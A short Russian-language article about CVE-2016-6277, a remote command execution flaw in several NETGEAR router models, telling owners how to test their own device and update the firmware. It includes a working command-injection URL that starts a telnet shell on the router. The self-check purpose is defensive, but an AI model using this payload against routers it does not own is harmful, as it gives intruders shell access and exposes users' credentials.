Уязвимости роутеров NETGEAR

Модели R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400, от компании NETGEAR со старой прошивкой, могут быть подвержены удаленному выполнению команд.

  1. Компания NETGEAR опубликовала на своем сайте что модели роутеров: R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400, могут быть подвержены уязвимости удаленного выполнения команд. Как это может произойти ? Узнать модель и названия роутера а также IP адрес и этого будет достаточно для удаленного выполнения команд. Могут быть перехвачены логин и пароли а также запущен на роутере telnet сервер.
  2. Для проверки уязвимости роутера можно воспользоваться следующими инструкциями для Windows.
  3. 1. Наберите в браузере http://[IP роутера]/cgi-bin/;telnetd$IFS-p$IFS’56789′, в место "IP роутера" IP-адрес роутера.
  4. 2. Наберите в командной строке: telnet [IP роутера] 56789, в место "IP роутера" IP-адрес роутера.
  5. 3. Если первая команда была выполнена, тогда вы получите приветственный экран командной оболочки роутера. Если увидели сообщение об ошибке, значит прошивка роутера не является уязвимой.
  6. 4. Если команда для роутера была выполнена, завершите процесс telnet. Посмотрите все запущенные процессы на роутере и выполните: kill < процесс id >, где процесс id идетификатор telnet.
  7. Проверьте прошивку своего роутера и сравните ее с прошивкой на сайте NETGEAR, ссылка на материал ниже.
  8. Security Advisory for CVE-2016-6277, PSV-2016-0245

  9. Ссылки упоминающиеся в статье:

    Перейти на официальный сайт NETGEAR.